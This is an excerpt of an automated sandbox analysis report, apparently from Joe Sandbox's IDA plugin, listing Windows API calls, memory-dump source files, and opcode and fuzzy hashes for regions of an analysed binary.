                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                • Opcode ID: e6825231cefd151e5008d72f1bca5bb07ee54e1551d64f1ab2b4a448b4458a75
                                                                                                                                                                                                                                                                • Instruction ID: 7f5853f06ab22ebde8b485ac2a9c3db848af54572bb50d62699d60477ea7a71e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6825231cefd151e5008d72f1bca5bb07ee54e1551d64f1ab2b4a448b4458a75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11B6B215011DBEEF119F64CC85EE77F9DEF08798F004211B718A2090CB769C61DBA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(0106DDC0,0106DDC0), ref: 006E097B
                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(0106DDA0,00000000), ref: 006E098D
                                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 006E099B
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8), ref: 006E09A9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 006E09B8
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(0106DDC0,000001F6), ref: 006E09C8
                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0106DDA0), ref: 006E09CF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                • Opcode ID: d30b6f619768579eae440c1a6b2b0b7855e4de60e22e75754e32e9f3373d763b
                                                                                                                                                                                                                                                                • Instruction ID: aeebc7be031bc00582d031b2e7e390bc6d61db46df9f2deccaafb9de2d0c33af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d30b6f619768579eae440c1a6b2b0b7855e4de60e22e75754e32e9f3373d763b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF0C932442A12EBE7525FA4EE89AD6BA29BF05702F406325F20294CA1CB799465CF94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 006A00BA
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A00D6
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 006A00ED
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A010B
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 006A0122
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A0140
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                                                                                                                                                                • Instruction ID: 5828684f617a31139c901ac88bc7c8be95be4c906c107b71ee5772108c0cf703
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2981C372A00B06ABEB20AF68CC41BAA73EAAF42324F25452EF551D6781E770DD418F54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006982D9,006982D9,?,?,?,006A644F,00000001,00000001,8BE85006), ref: 006A6258
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006A644F,00000001,00000001,8BE85006,?,?,?), ref: 006A62DE
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006A63D8
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 006A63E5
                                                                                                                                                                                                                                                                  • Part of subcall function 006A3820: RtlAllocateHeap.NTDLL(00000000,?,00741444,?,0068FDF5,?,?,0067A976,00000010,00741440,006713FC,?,006713C6,?,00671129), ref: 006A3852
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 006A63EE
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 006A6413
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                • Opcode ID: 2092e0d47b353e31aa50229d1b38e31ea126135257bdc84f72e9705fe9c7585c
                                                                                                                                                                                                                                                                • Instruction ID: 9b79756a7182eb07860e8c6135a8e6feb4c502ba6e6caa75dd6735b809b9a1cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2092e0d47b353e31aa50229d1b38e31ea126135257bdc84f72e9705fe9c7585c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7151B3B2600216ABDF25AF64CC81EEF77ABEF46750F194629FC05D6240DB34DD41CA60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 006E080C
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006E0847
                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 006E0863
                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 006E08DC
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006E08F3
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 006E0921
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                • Opcode ID: de84e91809c18a83163ce28131cb2a37b8bdf59ffd8f2857433a53200bf77fcf
                                                                                                                                                                                                                                                                • Instruction ID: 133d3a4e94090ddc0b104ac0dd7677956038edb6fa4abe4f83777ce3dcfd191a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de84e91809c18a83163ce28131cb2a37b8bdf59ffd8f2857433a53200bf77fcf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37419E71900205EFEF15AF54DC85AAA777AFF44300F1081A9ED009E297DB74DE61CBA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,006CF3AB,00000000,?,?,00000000,?,006C682C,00000004,00000000,00000000), ref: 0070824C
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00708272
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007082D1
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 007082E5
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 0070830B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0070832F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                                                                • Opcode ID: 4cd0432fc5fec056690d91500166435605558b17626b459ed0fe539a17edcb87
                                                                                                                                                                                                                                                                • Instruction ID: f0f73eca5965833b47b16edb397b114f9d06b5fef432b7e5df41a817c7c5d6cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cd0432fc5fec056690d91500166435605558b17626b459ed0fe539a17edcb87
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941A734601644EFDF61CF15C899BE87BE0FB4A714F1853A9E6484B2E2CB39A841CB56
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 006D4C95
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006D4CB2
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006D4CEA
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006D4D08
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006D4D10
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 006D4D1A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 72514467-0
                                                                                                                                                                                                                                                                • Opcode ID: 0c046167fe866a26cbbdaa36fb055cfdb8d2f974c1d9038de57b1359778311b6
                                                                                                                                                                                                                                                                • Instruction ID: ecbd7b254e79d0211498ff6ea0c78597edc6f75a970f887ef498e9328570876d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c046167fe866a26cbbdaa36fb055cfdb8d2f974c1d9038de57b1359778311b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9212632A04200BBEB265B39EC49E7B7B9EDF45750F10816EF809CA391EE75CC4187A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,006A5686,006B3CD6,?,00000000,?,006A5B6A,?,?,?,?,?,0069E6D1,?,00738A48), ref: 006A2D78
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2DAB
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2DD3
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0069E6D1,?,00738A48,00000010,00674F4A,?,?,00000000,006B3CD6), ref: 006A2DE0
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0069E6D1,?,00738A48,00000010,00674F4A,?,?,00000000,006B3CD6), ref: 006A2DEC
                                                                                                                                                                                                                                                                • _abort.LIBCMT ref: 006A2DF2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                • Opcode ID: 99ddfda83abaf6ef40f928f0a05c958aa22a6cd4bea785bd5d1207251c3da295
                                                                                                                                                                                                                                                                • Instruction ID: e5c1febdbff7850fbc65bf89f893fd88296aad586d970beea1eb4a065565e5b4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99ddfda83abaf6ef40f928f0a05c958aa22a6cd4bea785bd5d1207251c3da295
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCF0F93158450267C263333D7C26B5B1657AFC3B61B20421CF424922D3EF289C015D69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00689693
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: SelectObject.GDI32(?,00000000), ref: 006896A2
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: BeginPath.GDI32(?), ref: 006896B9
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: SelectObject.GDI32(?,00000000), ref: 006896E2
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00708A4E
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00708A62
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00708A70
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00708A80
                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00708A90
                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00708AA0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 43455801-0
                                                                                                                                                                                                                                                                • Opcode ID: e26f03811dd2ff1cd3caa7c74a1f032b8159b5dea076738becdca903162c5bc6
                                                                                                                                                                                                                                                                • Instruction ID: 43f4fedd53da0435edc8d7f37495a298163fa564be564de37f7fdb59cb4d4faf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e26f03811dd2ff1cd3caa7c74a1f032b8159b5dea076738becdca903162c5bc6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8110C7600014CFFEB129F90DC88EAA7F6DEB04354F04C212FA15991A1DB759D55DBA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006DEB30
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006DEB46
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 006DEB55
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006DEB64
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006DEB6E
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006DEB75
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                • Opcode ID: fe31608b93825c3ce8605206191cec97484a0dd2540c3722f10a83bc74a9138f
                                                                                                                                                                                                                                                                • Instruction ID: 2bdc17870ef43912a552c3e11c1d88777a7b7c11cec8d28298bf3c9362a5657b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe31608b93825c3ce8605206191cec97484a0dd2540c3722f10a83bc74a9138f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F09072500118FBE72257529C0EEEF3A7CEFCAB11F008359F601D1190DBA51A01C6B9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00677620: _wcslen.LIBCMT ref: 00677625
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006DC6EE
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006DC735
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006DC79C
                                                                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006DC7CA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: c4bee221f6f9368a45c811f85d4b27993cbbc450142e67f9fe9e5d08029682d1
                                                                                                                                                                                                                                                                • Instruction ID: 47b7ef66369fc331b1c14820ca7ee2c3cf7f91f99edf1e7644ed6481a14c2c39
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4bee221f6f9368a45c811f85d4b27993cbbc450142e67f9fe9e5d08029682d1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF510371A043469BD754EF28C884BAB77EAAF89320F040A2EF995D33D0DB74D844CB56
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 006FAEA3
                                                                                                                                                                                                                                                                  • Part of subcall function 00677620: _wcslen.LIBCMT ref: 00677625
                                                                                                                                                                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 006FAF38
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006FAF67
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
